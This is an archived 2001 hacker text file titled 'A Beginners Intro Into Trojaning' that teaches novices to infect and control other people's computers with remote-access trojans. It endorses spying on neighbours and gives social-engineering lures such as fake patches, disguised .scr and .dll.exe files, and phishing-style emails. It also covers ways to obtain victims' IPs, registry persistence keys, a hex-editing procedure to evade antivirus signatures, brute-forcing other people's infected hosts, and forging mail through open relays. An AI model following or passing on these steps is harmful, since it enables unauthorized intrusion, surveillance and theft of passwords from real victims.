Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Hacking Techniques :: abiit.txt

A Beginners Intro Into Trojaning





~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
 ##########################################14.08.01###
    _____              _____   _   _   ____    ____
   | ____|   _____    | ____| | | | | |  = |  | ___|
   | |      |     |   | |     | | | | | |\ \  | __|
   | ====    =====    | ====  |  =  | | | \ \ |    |
    =====[c-cure]==================================tm
 #####################################################
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

                 .-~   presents   ~-.  

        -= A Beginners Intro Into Trojaning =-  
              ._                     _.
                ~ by expl0it_shad0w ~

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

o0 - Table Of Contents - 0o

-= Section 1 =-

A> Introduction
B> Why use trojans?
C> Basic info on trojans

-= Section 2 =-

A> How trojans work
B> The TCP/IP Protocal
C> Basic trojan functions
D> Ways of infecting the victim
E> Ways of getting the victims IP

-= Section 3 =-

A> Advanced trojan functions
B> The trojan ports
C> Start up methods
D> What is a firewall?
E> Binders
F> Making your trojan undetected be AVS's
G> Accessing other infected computers

-= Section 4 =-

A> Commonly used trojans
B> Trojans I use
C> Sending emails anonymously
D> Where to get them from
E> Contacting me




-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Introduction

This is my first text phile ive written, so I hope its usefull and I hope you can all learn a thing or two from
it. I decided to write this phile to help beginners into Client/Server Aplications and the way comunicate. Before
we get into it, there are a few things I want to make clear. 
1> Trojans are NOT hacking tools,  Anybody who can click a mouse can use them. However trojans can be used once you 
allready have access to a system, so you can get back in with ease. If you want to learn to hack, then read another
phile.
2> DONT use trojans to delete, destroy or currupt data, unless you know the victim, as this is the lamest thing 
EVER.
3> You should ONLY use trojans to have some phun, try it on a friend when they are at work or home.

Ok now thats over read on......


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Why use trojans?

Many people ask me, "Why use troajns?". There is a few reasons to use them. I persnoally use them to mess with 
friends or to spy on my neigbour but most of all its for phun. With trojans there are so many functions to use.
So there are many things to do with the victim which I will discuss later on in the phile.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Basic info on trojans

A trojan is defined as:
"A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate
themselves but they can be just as destructive. One of the most insidious types of Trojan horse is a program that
claims to rid your computer of viruses but instead introduces viruses onto your computer." 

The term comes from a story in Homers Iliad, in which the greeks give a giant wooden horse to their foes, the 
trojans, ostensibly as a peace offering. but after the trojans drag the horse inside their city walls, Greek 
soldiers sneak out of the horsess hollow belly and open the city gates, allowing their compatriots to pour in and
capture Troy.

There are many different types of trojan, Distrustive, Client/Server or just plain anoyance. In this phile we will
only be talking about Client/Server trojans.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

How trojans work

The way a trojan works is quite simple. There are usually two parts to a trojan, Client/Server. thw whole idea is
the victim gets a Server which listens to a certain port. And we use the Client to connect to the victims IP 
(explained later) and to the victims open port, which the trojan is listening on. The Server (once activated),
hides in memory and does certain changes to the victimes system. It will add a start-up entry to the systems 
registry or in the autoexec.bat, win.ini or something simlliar files. So the server can automatically start up
when windows starts up. The most common start up method is inside the windows registry and often looks like this:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Server"="C:\\WINDOWS\\server.exe"

It then copys it self to a hiden place in the windows or windows\system directory, so it is not visible to the user.
This is know as Infection. The server can be set up so once the victim has opened the server phile once, it
melts it self, so clever victims can not look at the phile. The server can also be set up to send the victims 
deatils along with current IP and Port number to a set email address. Many people now bind trojan servers with other
clean philes so people who are parinoid dont get the wrong idea. Once the victim is infected we can then open up 
the client and connect to remote host with the port number and/or password we set. Onced connected we can do alot of
things (explained later).

  _____                                          _____
 |     |                                        |     |
 |     |-----------|--IP--|--port--|--Password--|     |
 |_____|    wan                                 |_____|
                                                    
local host                                    remote host
- Client -                                     - Server -


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

The TCP/IP Protocal

TCP/IP is a set of protocols developed to allow cooperating computers to share resources across a network. It was 
developed by a community of researchers centered around the ARPAnet. Certainly the ARPAnet is the best-known TCP/IP
network. However as of June, 87, at least 130 different vendors had products that support TCP/IP, and thousands of
networks of all kinds use it. First some basic definitions. The most accurate name for the set of protocols we are 
describing is the "Internet protocol suite". TCP and IP are two of the protocols in this suite. Because TCP and IP 
are the best known of the protocols, it has become common to use the term TCP/IP or IP/TCP to refer to the whole 
family. It is probably not worth fighting this habit.

A connection is fully defined with 4 parameters, a source host and port, and a destination host and port.

When you make a connection, data is send in packets. Packets take care of low level trafic, and make sure the data
arrives (sometimes with special error handling). The spine of most networks is the IP protocol version 4. It is
totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets. 
All those packets consist of a header and data. IP header contains (amongst other things): IP of source and 
destination hosts for that packet, and the protocol type of the packet wrapped up in it. (TCP=6, UDP=17, etc.).

UDP packets contain (amongst other things): port number of source and destination host. UDP has no such thing as 
SEQ/ACK, it is a very weak protocol. TCP packets contain (amongst other things): port number of source and 
destination host, sequence and acknowledge numbers (further refered to as SEQ/ACK), and a bunch of flags. 
SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be send, or that is send in this
packet. ACK number: is the SEQ number that is expected from the other host. SEQ numbers are chosen at connection
initiation.

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Basic trojan functions

Here is a list of some basic trojan functions and what they do:

Filemanager - This is used to access the victims HD's. The file manager will normally have some extra features 
inside, some of which are Upload, Download, Execute, Excute hidden, Show image, set image as desktop wallpaper, 
Play sound, Delete a file, Move a file, Make a new folder and Copy a file.

Find Files - This lets you find any file on the victims HD(s).

Manual cmds - This is often included in a trojan horse so you can enter the commands manualy instead of clicking a 
button.

Live capture - this is a good function and lets you take lots of pictures of there desktop one after the other so
you can see whats going on.

Open/Close CD rom - self explanitry.

Hide/show start button - self explanitry.

Set system date - self explanitry.

Messageboxes - This option lets you send message boxes to your victim, with the message, buttons, message type you 
want to send them.

System colors - This lets you read/change the victims system colors.

Flip Screen - self explanitry.

Set Resolution - This lets you set the victims screen resolution.

Mouse Options - This may include enabling/disabling the victims mouse. swapping buttons or even moving the mouse.

Goto URL - This lets you choose where you want the victims web browser to goto.

Print Text - This allows you to write a message and make the victims printer print out a message.

Remote host info - this is used to gather information about the remote host.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Ways of infecting the victim

There a few good ways of infecting the victim:

1> Go and get a messnger like Yahoo! or MSN messenger (or just one which allows file transfering). Once you have 
done this go and find any random person or a lamer and start talking to them. The whole idea is to use social
engineering to trick them into accepting your phile. Say "look at this new yahoo tool I got!" - you will be 
supprised on how many people actually fall for it.

2> Sit and wait in a chat room listening for people who need a certain phile. And you say "hey I got that phile" 
and then start a transfer with your messenger to them. NOTE: Make sure you rename the server to the phile they
want. E.g If they want Msvbvm60.dll then you rename your server to Msvbvm60.dll.exe (dont worry about leaveing the 
.exe there, if they are stupid they would have left the windows setting as they defaultly come, and windows chops 
of common file extensions so you will be left with .dll instaed of .dll.exe). If they dont have messenger email it 
to them.

3> Rename your .exe to .scr and tell somebody in the chatroom that youve got a new screen saver to show them. 
When they open it, it will start up like normal which tricks the user into thinking they just opened a screen saver
instead of a .exe.

4> Set up a simple http server ( available from http://www.analogx.com) on your system. Then design a webpage,
(the better it looks, the more beliveable it is) with a link to the  server phile and click start on your http
server. Now copy your IP and give it to them in the form of, http://yourip so if your IP is 184.216.84.61 then
the address would be: http://184.216.84.61. NOTE: To find out your IP address goto Start/Run and type: winipcfg
and this will tell you your IP address. The reason I told you this option is simple, say your victim is clever,
and knows not to accept philes from strangers. If you set up a simple http web server with a good webpage then
they might belive that the phile is ok to download.

5> Get your victims email address, and write a message to them poseing as there friend, company selling a new 
product and they have been chosen as a beta tester or there yahoo, MSN or any other chat network they uses admin. 
And say that there have been some brakins to the network by hackers recnetly and that they are to use the patch you
sent them to help tighten security. NOTE: Dont send the email from your mail account, instead send it anonymously 
via telnet or some other anon mail program. (I will expain how to do this later on)


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Ways of getting the victims IP

Now this part is important, because without the IP most Client/Servers dont work.

1> When you are sending them the server phile with a messenger, your machines connect and make a thing called a 
Direct Transfer. While they are downloading the phile just open up dos and type netstat. This also works when they
are sending you a phile, so you can ask them for a phile and then open up dos and type netstat. NOTE: This will
only work if they are not behind a proxy, Because a proxy stops you from seeing there IP. Instead you get the 
proxys IP and this is no good.

  _____                                            _____
 |     |                                          |     |
 |     |<-----------------------------------------|     |
 |_____|            Direct Transfer               |_____|
                                                    
local host                                      remote host
127.0.0.1                                      187.66.121.70     >   By typeing netstat we would get 187.66.121.70
                                                                                       This is OK
  _____                   _____                    _____
 |     |                 |     |                  |     |
 |     |<----------------|     |<-----------------|     |
 |_____|                 |_____|                  |_____|
                                                     
local host                proxy                  remote host
127.0.0.1                24.0.0.1               187.66.121.70    >   By typeing netstat we would get 24.0.0.1
                                                                                     This is bad

2> Try the above, but this time ask them to email the phile to you (Just say you need a system phile) now when the 
email comes open it up in Outlook express and choose the message they sent you and click the right mouse button and
goto propities, details and there will be some strange information. This is an exapmle of that you will see:

X-Apparently-To: formatkid@yahoo.com via web13406.mail.yahoo.com; 13 Aug 2001 12:03:49 -0700 (PDT)
X-Track: 2: 40
Received: from 66.76.119.67  (HELO formatkid) (66.76.119.67)
by mta574.mail.yahoo.com with SMTP; 13 Aug 2001 12:02:34 -0700 (PDT)
From: lamer@hotmail.com
To: formatkid@yahoo.com
Subject: heres that file you wanted, hope it helps you!
Mime-Version: 1.0

Now the above tells us that this message was sent from 66.76.119.67 and that is our victims IP adrress.

3> This can be used with the infection method I talked about above where you use a http server. when they connect 
to your machine to download the trojan server, use a program that can log them conecting to your machine e.g netmon
(available from http://www.leechsoftware.com) or you could use netstat.

4> most good trojans have a Auto-Notification setting. This allows you to specifiy your ICQ number or your email
address, so everytime they log onto the internet, there details along with there current IP address and port number 
are sent to you. Some trojans include CGI - notification. This is a rare techinique so watch out for it.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Advanced trojan functions

Window mng - This allows us to view what windows they have currently active windows on there system. It also gives 
us options like, hide/Show, Minimize/Maximize, Close or Bring to top a selected window.

Process mng - This allows us to view what active processes are currently in memory. It also lets us terminate any 
runing process.

Registry editor - This lets us view edit or change the victims registry.

Disable Crash Reboot - These options let us RAS hangup, system crash, Give a bluescreen error, Disable thw windows 
GUI, Disable keyboard/mouse or exit the windows kernel.

App re-direct - This lets us get an out put from there dos.

Online/Offline Keylogger - This records all keystrokes the victim has made and prints it to screen/or file.

Clipboard - This lets us view the victims clipboard.

Password options - This allows us to view the victim system passwords.

Server Options - This lets you edit/change the server.

Port re-direct - This listens to one of there remote port and directs it to another remote IP/and port.

Ftp server - This opens up a FTP server on the victims machine.

Packet Sniffer - This sniffs the packets sent from the victims machine and sends them to your IP and a remote UDP 
port on your system.

Network browser - This allows you to browse the network they are connected to. NOTE: Only if they are connected to
a network.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

The trojan ports

Here are a few default trojan ports:
Trojan name / Port

NetBus 1.x = 12345
NetBus Pro = 20034
SubSeven = 1243
NetSphere = 30100
Deep Throat = 6670
Master Paradise = 31
Silencer = 1001
Millenium = 20000
Devil 1.03 = 65000
NetMonitor = 7306
Streaming Audio Trojan = 1170
Socket23 = 5000
Socket25 = 30303
Gatecrasher, netControl = 6969 
Telecommando = 61466
Gjamer = 12076
IcqTrojen = 4950
Priotrity = 16969
Vodoo = 1245
Wincrash = 5742
Wincrash2 = 2583
Netspy = 1033
ShockRave = 1981
Stealth Spy = 555
Pass Ripper = 2023
Attack FTP = 666
GirlFriend = 21554
Fore = 50766
DeltaSource (DarkStar) = 6883
Tiny Telnet Server = 34324
Kuang = 30999
SennaSpyTrojans = 11000
Backdoor = 1999
WebEx = 1001
UglyFtp = 23456
TrojanCow = 2001
TheSpy = 40412
Striker = 2565
Silencer = 1001
RoboHack = 5569
RemoteWindowsShutdown = 53001
Prosiak 0.47 = 22222
ProgenicTrojan = 11223
PortalOfDoom = 9872
InIkiller = 9989
IcqTrojan = 4950
BladeRunner = 5400
The tHing = 6400
PsyberStreamingServer Nikhil G. = 1509
Phineas Nikhil G. = 2801
Indoctrination = 6939
HackersParadise = 456
Doly Trojan 1.1+1.2 = 1011
FTP99CMP = 1492
Shiva Burka = 1600
BigGluck, TN = 34324
Hack´99 KeyLogger = 12223
iCkiller = 7789
iNi-Killer = 9989
Portal of Doom = 9875
Master Paradise = 40423
BO jammerkillahV = 121
AOLTrojan1.1 = 30029
Hack'a'tack = 31787
The Invasor  Nikhil G. = 2140
SpySender Nikhil G. = 1807
The Unexplained  = 29891
Bla = 20331
FileNail Danny = 4567
Coma   Danny = 10607
Shitheep  Danny = 69123
Bla1.1 = 1042
HVL Rat5 = 2283
BackConstruction1.2 = 5400
Doly Trojan 1.30 = 1010
Doly Trojan 1.5 = 1015
Trojan Spirit 2001 a = 33911
Vampire 1.0 = 6669
Maverick's Matrix = 1269
Total Eclypse (FTP) = 3791
OOTLT = 5011
Eclipse 2000 = 12701
NetMetro1.0 = 5031
IllusionMailer = 5521
NetAdmin = 555
Logged! = 20203
Shitheep = 6912
Schoolbus 1.6+2.0 = 54321
Chupacabra = 20203
XTCP 2.0 + 2.01 = 5550
Transcout 1.1 + 1.2 = 1999
SoftWar = 1207
Ambush = 106666
DerSpaeher 3 = 2001
ThePrayer 1.x = 9999
HostControl 1.0 = 6669
YAT = 37651
NetRaider = 57341
TCPShell.c = 6666
PC Crasher = 5637
Insane Network 4 = 2000
Mini Command 1.2 = 1050
Mosucker = 16484
Incommand 1.1+1.2+1.3+1.4 = 9400
FakeFTP = 1966
Rat1.2 = 2989
Intruse Pack 1.27b = 30947
Freak 88 = 7001
Asylium Family = 23432
Prosiak = 4444


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Start up methods

Here are some commonly used start up methods:

Win.ini = C:\windows\win.ini
[windows]
Run=
Load= 

Anything filename after the run or load= will startup everytime you boot up. 
Please note that the file maybe hidden to the left so completely scroll over to see if there isn't a file name 
hidden there. Some aol.pws hide over there. 

System.ini = c:\windows\system.ini
[boot]
shell=explorer.exe C:\windows\filename 

Another way to startup a file is use the shell method. The file next to explorer.exe will startup when ever 
windows starts up. Also scroll all the way over just to be sure. The file next explorer.exe can be deleted stoping 
the server from starting up that way. Also the location should be revealed with the filename. If it isn't revealed 
assume it is in the windows folder and search for the file name there. 

Go to start> run> Type "sysedit" this will open up a program with multiple windows. One window will say system.ini
one will say win.ini there will be two others ignore those. This is just an easier way of accessing system.ini and
win.ini 

Before we move to registry there is one folder C:\WINDOWS\Start Menu\Programs\StartUp 
any file in here will startup when windows is booted up. 

Now the registry, Note that any changes could compromise your system so do only what we say. 
To access your registry go to start> run> type "regedit" without the "" A window with multiple what looks like
folders should pop up e.g. HKEY_LOCAL_MACHINE. 

There are multiple startup places in your registry here is a list (The more common ones are in bold the less known
ones are in italics): 

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*" 

If these keys don't have the "\"%1\" %*" value and are changed to "\"server.exe %1\" %*" than it is running a file
on startup most likely a Trojan. 


These keys were used in sub7 2.2 New Methods

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\User shell folders 
Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes" 

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key states that all apps will be executed if ICQNET Detects an Internet Connection. 

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object" "NeverShowExt"="" 
This key changes your files specified extension. 

More commonly known keys: 


[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]



-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

What is a firewall?

A firewall is any one of several ways of protecting one network or computer from another untrusted network or 
computer. The actual mechanism whereby this is accomplished varies widely, but in principle, the firewall can be 
thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit
traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Binders

Theres not much to say about these.
Binders are used to bind your trojan .exe with another .exe, .jpeg or other phile you choose. This can help with 
the stealth the servers have. You can use a binder to bind a trojan with a picture and then give them the end 
product and they will not suspect a thing.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,F =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Making your trojan undetected be AVS's

I read this at sinred a while back and thought its worth saying in here aswell.

You will need:
your trojan server
a phile splitter
a hex editor

Create a directory and place your trojan server.exe in it
Run AV over the directory and it will spot the .exe as a virus
Use the file splitter to cut your exe into seperate 1mb sections
Run AV over the directory and it will spot one of the files as a virus
delete the others.
keep splitting the (now 1mb) partial.exe into smaller sections till you get it real small and still triggering the
antivirus.
when its about 24 bytes start deleting the last byte and running AV - then deleting the next last byte and running
AV ... till AV fails to recognise it
... 93 05 B4 4A CD 21 <- Spotted as trojan
... 93 05 B4 4A CD <- Spotted as trojan
... 93 05 B4 4A <- NOT spotted as trojan
replace the last byte
... 93 05 B4 4A CD

Now lets trim the starting bytes the same way - one at a time till no longer recognised as a trojan

22 23 51 8C DB 8E C3 ... <- Spotted as trojan
23 51 8C DB 8E C3 ... <- Spotted as trojan
51 8C DB 8E C3 ... <- Spotted as trojan
8C DB 8E C3 <- NOT Spotted as trojan
replace the last byte you removed
51 8C DB 8E C3 ... 93 05 B4 4A CD

now you should have the smallest number of bytes (maybe about 12) that the AV program will recognise as being the
trojan. Congratulations, you just found the viral signature.
now - lets find where that sequence of bytes occurs in the original .exe - lets say at offset 0D98:0348
load your server.exe into Microsofts 'debug' program with the DOS command 'debug server.exe' and go to that offset,
then press U to unassemble the bytes.

51 8C DB 8E C3 8B 1E 93 05 B4 4A CD
0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
0D98:034D 8B1E9305 MOV BX,[0593]
0D98:0351 B44A MOV AH,4A
0D98:0353 CD21 INT 21

Look at the instructions - PUSH CX pushes the CX register onto the stack, and the following instruction MOV BX,DS
doesnt alter CX -or- the stack - it is fairly safe to assume we can swap these two instructions and hopefully it
wont make a difference to the execution of the program - so lets do that So..

we hexedit '51 8C DB 8E C3'
0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
so that it becomes '8C DB 51 8E C3'
0D98:0348 8CDB MOV BX,DS
0D98:034A 51 PUSH CX
0D98:034B 8EC3 MOV ES,BX

And save our new server.exe
Since we have switched a few bytes in the signature it will no longer register as a trojan on our AV. Test it to 
make sure it still works as expected - it should if you are careful about which two instructions you switch.
also remember that only one byte of the signature needs to change - so dont worry if one of the instructions you 
chose is partialy or even completely outside of the signature bytes - as long as it results in some change within 
the signature.
NOTES:
Not all antivirus programs use the same set of bytes for a signature - so check your new file against other popular
AV programs too, and repeat the process if required, till ALL common AV programs fail to report the file.
You may also need to do the same with any supporting .DLL's that the server installs on the remote, as these
normaly have telltale signatures too. Once you have a new version DONT post it - if it is widely distributed it
will eventualy find its way onto the AV vendors lists as a 'new strain' - treat this as a PERSONAL version, and 
it will last you long into the future.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,G =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Accessing other infected computers

If you cant be bothered to infect your own victim, then youll have to search for other peoples hardwork :)
One way to get an infected pc, is to use a portscanner with the options to scan a range of IP's and check the
ports that are open for different types of trojan. Most trojan clients have there own port scanner, but they only
search for there server :( Once youve found your self an IP and port its time to connect. Most of the time the 
server will be password protected, so youll have to get your self a trojan cracker which can do bruteforce and 
(or) wordlist attacks. NOTE: scanning can take hours, its a tricky process but its worth doing.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Commonly used trojans

Some commonly used trojans are: 

Netbus
NetBus Pro has many features for remote administration like the File manager, Registry manager and Application
Redirect. In addition, NetBus Pro brings you features like Capture screen, Listen keyboard and Capture camera 
image for spying. All this features, among several others, are migrated into a single package. NetBus Pro consists
of a server and a client-part. The server-part is the program which must be operating on the computer you wish 
to administrate. The client-part is the program you use to connect to another computer. Indeed, you don’t even
need the NetBus Pro client available to access your computer today. With the built-in Telnet Server and HTTP
Server, you can access your MS-DOS-prompt and your files with just a Telnet-program and/or web-browser! Two
or more clients can be connected to a NetBus Pro server at a time without any conflicts.

Backorifice
This is like the daddy of all trojans just like netbus. Its got all the common options aswell as extras. Its well 
worth downloading! - www.cultdeadcow.com

Sub7
wow this trojan keeps on getting better and better its a good download. - www.sub7.slak.org 

Mosucker
MoSucker was written in Visual Basic 6.0 Enterprise Edition. The sourcecode has about 16,000 lines, most of this 
stuff was written by me, but I also used some code from PlanetSourceCode, the greatest page on the net!
MoSucker uses a direct TCP protocol to connect, I think this has become a very nice one, it is very fast and 
processes packets like they were sent, not like they arrive (oh yeah i'm sure you'll understand me if you already
worked with windows sockets *g). Client, Server and ServerCreator run on all currently availabe 32bit versions of 
Windows, this means: 95, 98, 98SE, ME, NT and 2000. - www.infernoindustries.cjb.net

Bionet
BioNet has the most efficient server available today.
With its own Unique file transfer protocal making transfers up to 90% faster.
BoiNet has its own unique encryption engine making it one of the safest in the world.

We were the first to bring you functions such as 
ICQ notify , Flip VDU , Delayed Server Execution, Keylog Emailer , and more.

With release 12 we are THE ONLY trojan currently to have a custom CGi notify.
We are the only torjan to use an automated email to send you all offline keystrokes when the server comes online.
No longer do you have to rely on ICQ to tell you when they are on
and no longer do you have to wait for them to come online to download their logs.

With broadband comming more widely available the new bionet 3 engine has the capacity
to provide a stable platform for high speed data connections with multi threaded file transfer
and realtime streaming media.
This is where you will see many other existing trojans fail to cope. - bionet.tlsecurity.com
This is the most advanced GUI trojan yet.

GirlFriend 
Girlfriend is a program which allows you to get information on applications
running on remote PC. That means that if any computer connected to net
is infected with GirlFriend - you can connect to this PC and "steal" such
information as:
  - text, that "infected" user enters to any window containing password
field;
  - passwords, which "infected" user enters to password fields.
You also can:
  - send "system" messages to remote PC;
  - play sounds;
  - show bitmaps (.bmp pictures);
  - run exe files;
  - send "victim" to any URL;
  - change server's port;
  - hide GF Client with BOSSKEY=F12;
  - scan subnet for infected servers;
  - save windows list;
  - work with files and folders using GF filemanager.

y3k rat.
Y3K Rat is a remote administration tool, which controls a remote computer. - www.y3knetwork.org


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Trojans I use

I dont use them much anymore but I use:

Tini server, this is a very small telnet server and is the best one ive ever seen.
Mosucker, this is such a cool trojan tho i havent used it in a while.
Total Eclypse, this FTP trojan is old but still very good.
Bionet, The most advanced trojan ive saw yet its worth using if you want to get into to troaning.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 4,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Sending anonymous emails

First telnet to port 25 (sometimes 19) of a server, as port 25
is the default mail port. here's an exaple of what comes up: 

220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP) [d/o/u/g] ready
at Thu, 10 Oct 96 00:03:17 -500 (CDT) 

then you type: 

mail from:whoever@wherever.com (this is who you're saying it is from)

it says: 

250 <whoever@wherever.com> ... Sender Okay 

then you type: 

rcpt to:somebody@somewhere.com (this is who you're sending it to)

it says: 

250 <somebody@somewhere.com> ... Recipiant Okay 

then you type: 

data 

it says: 

354 Enter mail, end with "." on a line by itself 

you type: 

To: somebody@somewhere.com 
From: whoever@wherever.com 
Subject: The Subject 
Say whatever you want here, if you mess up, and need to change a 
line above the one you're working on, don't try to fix it, it won't
let you, and it'll just spit out crap... 
. 
(^tells the server that you are done) 

it says: 

250 Mail accepted 

then you type: 

quit


Ok, now a recap of just what I(you) type(ed)

MAIL FROM:whoever@wherever.com
RCPT TO:someone@somewhere.com
DATA
From: whoever@wherever.com (Name)
To: someone@somewhere.com
Subject: Whatever
Reply-To: whoever@wherever.com
Your message....
.
QUIT

Here are a few servers:

mail.airmail.net:25 
mail.geocities.com:25 
mnsi.net:25 
hacker.com:25 
mail.iaw.on.ca:25 
pdx.sisna.com:25 
jaring.my:25 
chollian.dacom.co.kr:25 
all-yours.net:25 
plix.com:25 
ids.net:25 
student.uq.edu.au:25 
istar.ca:25 
total.net:25 
mail.tfs.net:25 
ecis.com:25 
mindspring.com:25 
popmail.uc.edu:25 
mail.atcon.com:25 
future.net:25 
aloha.net:25 
ovnet.com:25 
connect.reach.net:25 
valley-internet.net:25 
valleynet.com:25 
milo.cfw.com:25 
scs.august.com:25 
hiwaay.net:25 
clandjop.com:25 
unix.diisd.k12.mi.us:25 
